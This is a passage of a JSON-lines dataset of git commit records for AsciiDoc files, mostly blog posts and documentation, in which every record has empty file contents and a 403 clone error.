2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","new_file":"2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd24a3a8d10e061e8703ca43c4a87b1570382e48","subject":"Update 2015-06-06-Lorem-ipsum-3.adoc","message":"Update 2015-06-06-Lorem-ipsum-3.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-06-Lorem-ipsum-3.adoc","new_file":"_posts\/2015-06-06-Lorem-ipsum-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2fa0d1b5538ebf924db69ea67eaf14b9b62f8db7","subject":"Update 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","message":"Update 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"_posts\/17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","new_file":"_posts\/17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71a376e930a9b7461a38e717e4525fce940f5fd0","subject":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","message":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55f9ed7c6f205f060acb85f1839ea3af061da17d","subject":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","message":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a46a2a9aa27250c2c1765f4b438262ca5eb95787","subject":"Publish 20150327-Happy-Easter.adoc","message":"Publish 20150327-Happy-Easter.adoc","repos":"mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io","old_file":"20150327-Happy-Easter.adoc","new_file":"20150327-Happy-Easter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcrotty\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"798213d26b3c356b56cc912ecad6a62e1b694f23","subject":"correct syntax error","message":"correct syntax error\n\nSigned-off-by: Dan Mack <f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"activities.adoc","new_file":"activities.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2e6521f335163c55189dee6aeca39893dcc092c","subject":"Update 2016-04-23-Its-Saturday.adoc","message":"Update 2016-04-23-Its-Saturday.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-04-23-Its-Saturday.adoc","new_file":"_posts\/2016-04-23-Its-Saturday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95270904a9b9740f54c4ad5689ac2cf6292097a3","subject":"Update 2016-06-02-Word-Press-2.adoc","message":"Update 2016-06-02-Word-Press-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40a225aedf456d45ec9b25e0130159996ff0be04","subject":"Update 2015-08-21-Launch-of-the-new-blog.adoc","message":"Update 2015-08-21-Launch-of-the-new-blog.adoc","repos":"Motsai\/old-repo-to-mirror,Motsai\/old-repo-to-mirror,Motsai\/old-repo-to-mirror","old_file":"_posts\/2015-08-21-Launch-of-the-new-blog.adoc","new_file":"_posts\/2015-08-21-Launch-of-the-new-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Motsai\/old-repo-to-mirror.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51f174d60727d515acf9396c4cc462c7b3fc14b8","subject":"Update 2016-11-15-091000-Tuesday-Morning.adoc","message":"Update 2016-11-15-091000-Tuesday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-15-091000-Tuesday-Morning.adoc","new_file":"_posts\/2016-11-15-091000-Tuesday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc20508ae5818e40e6e24e5f0e843ed2dbd3c011","subject":"Update 2017-10-12-start-chrome-extension.adoc","message":"Update 2017-10-12-start-chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-12-start-chrome-extension.adoc","new_file":"_posts\/2017-10-12-start-chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdf33a9ff398e43b2ef4c2f24fcefb5f2ec459b0","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bef14e19ba0df2044456900ac50229d95eb23458","subject":"Imported release notes for Groovy 1.6","message":"Imported release notes for Groovy 1.6\n","repos":"webkaz\/groovy-website,marcoVermeulen\/groovy-website,sdkman\/sdkman-website,marc0der\/groovy-website,kevintanhongann\/groovy-website,dmesu\/sdkman-website,PascalSchumacher\/groovy-website,rahulsom\/sdkman-website,kevintanhongann\/groovy-website,webkaz\/groovy-website,m-ullrich\/groovy-website,dmesu\/sdkman-website,groovy\/groovy-website,benignbala\/groovy-website,marc0der\/groovy-website,sdkman\/sdkman-website,rahulsom\/sdkman-website,groovy\/groovy-website,marcoVermeulen\/groovy-website,benignbala\/groovy-website","old_file":"site\/src\/site\/releasenotes\/groovy-1.6.adoc","new_file":"site\/src\/site\/releasenotes\/groovy-1.6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dmesu\/sdkman-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9a527b77607a9c58f664be7d74bb0ca95d6a4e97","subject":"Update 2016-07-12-Mudar-o-endereco-do-site-no-Word-Press.adoc","message":"Update 2016-07-12-Mudar-o-endereco-do-site-no-Word-Press.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2016-07-12-Mudar-o-endereco-do-site-no-Word-Press.adoc","new_file":"_posts\/2016-07-12-Mudar-o-endereco-do-site-no-Word-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8020e16c0d3373b51d776d9d5bb67cf6cd1c3a16","subject":"Update 2017-09-17-Acemice-Belki-Hadsizce-5.adoc","message":"Update 2017-09-17-Acemice-Belki-Hadsizce-5.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-09-17-Acemice-Belki-Hadsizce-5.adoc","new_file":"_posts\/2017-09-17-Acemice-Belki-Hadsizce-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcb08fcd92095f540b2df3b82e78660932d3a556","subject":"[docs] Add troubleshooting for KuduStorageHandler","message":"[docs] Add troubleshooting for KuduStorageHandler\n\nChange-Id: I80e028a6f827269d97f26ec7a2cf4b8c22d2a838\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6738\nTested-by: Kudu Jenkins\nReviewed-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fdce442aece7658937039872a7f712cd75fd1370","subject":"changing the install link to CE page","message":"changing the install link to CE page\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a47ca2ec65bc5ce1b91e56b1990f254c28abe083","subject":"Update 2015-06-22-Documenter.adoc","message":"Update 2015-06-22-Documenter.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-22-Documenter.adoc","new_file":"_posts\/2015-06-22-Documenter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8adf2b9a2d2365cd5b6f44c3cb798e6494b578f","subject":"y2b create post iPad 2 Size Comparison \\u0026 Camera Test In HD","message":"y2b create post iPad 2 Size Comparison \\u0026 Camera Test In HD","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-11-iPad-2-Size-Comparison-u0026-Camera-Test-In-HD.adoc","new_file":"_posts\/2011-03-11-iPad-2-Size-Comparison-u0026-Camera-Test-In-HD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4123455a8e85a03281c82601223996900325e0c5","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40567aa22e3bc19246fd4befbf342791fb351b15","subject":"Added some deployment recipes","message":"Added some deployment recipes\n","repos":"korczis\/gooddata-ruby-examples,korczis\/gooddata-ruby-examples","old_file":"07_delpoyment_recipes\/disabling_schedules.asciidoc","new_file":"07_delpoyment_recipes\/disabling_schedules.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/korczis\/gooddata-ruby-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2443a09c9751892a8bde0f6e925f59c62e00d737","subject":"Update 2094-1-1-Puzzle-7-C-U-B-E-S.adoc","message":"Update 2094-1-1-Puzzle-7-C-U-B-E-S.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2094-1-1-Puzzle-7-C-U-B-E-S.adoc","new_file":"_posts\/2094-1-1-Puzzle-7-C-U-B-E-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30b33bd916b2473717023398f0400a9fde5b4965","subject":"Update 2015-02-21-Writing-Hello-World-N-Times.adoc","message":"Update 2015-02-21-Writing-Hello-World-N-Times.adoc","repos":"hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io","old_file":"_posts\/2015-02-21-Writing-Hello-World-N-Times.adoc","new_file":"_posts\/2015-02-21-Writing-Hello-World-N-Times.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hhimanshu\/hhimanshu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a7769a0b60123d7318ff35a098035afe6eae267","subject":"Update 2016-04-16-google-analytics-with-google-app-script.adoc","message":"Update 2016-04-16-google-analytics-with-google-app-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-app-script.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-app-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2436e96bc8dacdd945dd50c8d307fc77c5de1ea","subject":"y2b create post This Technology Turns Alcohol To Vapor","message":"y2b create post This Technology Turns Alcohol To Vapor","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-27-This-Technology-Turns-Alcohol-To-Vapor.adoc","new_file":"_posts\/2017-02-27-This-Technology-Turns-Alcohol-To-Vapor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"552d14cdbe9fff82749a67541236ec307305ffc7","subject":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","message":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9ba4b41d2d1dfbd752383f9dea4e510e5c23a81","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27a904418032b4c6d4706bf81e3f2f63149fa016","subject":"Update 2016-06-10-Amazon-Machine-Learning.adoc","message":"Update 2016-06-10-Amazon-Machine-Learning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-Amazon-Machine-Learning.adoc","new_file":"_posts\/2016-06-10-Amazon-Machine-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f79e883d764a38efaf007b3fc50afad3113cf07","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ba8f07f07b3694e1cd46220e80874895413fcdf","subject":"Renamed '_posts\/2018-02-25-3-Cool-Gadgets-Under-$80.adoc' to '_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc'","message":"Renamed '_posts\/2018-02-25-3-Cool-Gadgets-Under-$80.adoc' to '_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc","new_file":"_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1ae865b90498c876eb5f9412e085f267102668f","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41b41c4594e734c20254a48b394039643f3e0c8c","subject":"Update 2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","message":"Update 2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","new_file":"_posts\/2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0af4004c193670ec157882f140fe7ae0af1c9fac","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/brave_new_post.adoc","new_file":"content\/writings\/brave_new_post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"11d74372c910ef596693553a7042d6545e3c416c","subject":"Update 2015-08-06-Docker-Compose-the-only-requirement-for-your-app.adoc","message":"Update 2015-08-06-Docker-Compose-the-only-requirement-for-your-app.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Docker-Compose-the-only-requirement-for-your-app.adoc","new_file":"_posts\/2015-08-06-Docker-Compose-the-only-requirement-for-your-app.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3aab57a7a0cf8701099ab5bcf2ab3c9dddfb3216","subject":"Small typo in `README.adoc`","message":"Small typo in `README.adoc`\n\n`air gap` > `air-gapped`.\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb5562c98a23398b9d2cce96435e769e6c7fda40","subject":"[doc] Move the toc after the introduction","message":"[doc] Move the toc after the introduction\n","repos":"netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netceler\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7a0273b964ec33d685612da68fde6cfe45b1e3f","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9105be707872901ad2da5a6278b8c3a6de1369e6","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68143f2be6b9d649b18221408bb1136c50ee7d0a","subject":"Update 06-04-2017-Test-1.adoc","message":"Update 06-04-2017-Test-1.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/06-04-2017-Test-1.adoc","new_file":"_posts\/06-04-2017-Test-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1900c6b3eb0eebe22c607c5f6e811f8feed62f52","subject":"Update 2016-01-12-Groovy.adoc","message":"Update 2016-01-12-Groovy.adoc","repos":"fabself\/fabself.github.io,fabself\/fabself.github.io,fabself\/fabself.github.io","old_file":"_posts\/2016-01-12-Groovy.adoc","new_file":"_posts\/2016-01-12-Groovy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fabself\/fabself.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"097bec685adb88d504712bb6357b5abea5a49970","subject":"Update 2018-02-02-Go-O-R.adoc","message":"Update 2018-02-02-Go-O-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-Go-O-R.adoc","new_file":"_posts\/2018-02-02-Go-O-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c97dafaabb839ab6c21efaca593e1b213b0c90fe","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7f5062b657a5ec590899e0db15fb0eff02176bf","subject":"Create test.adoc","message":"Create test.adoc","repos":"griffio\/griffio.github.io,griffio\/griffio.github.io,griffio\/griffio.github.io","old_file":"test.adoc","new_file":"test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/griffio\/griffio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 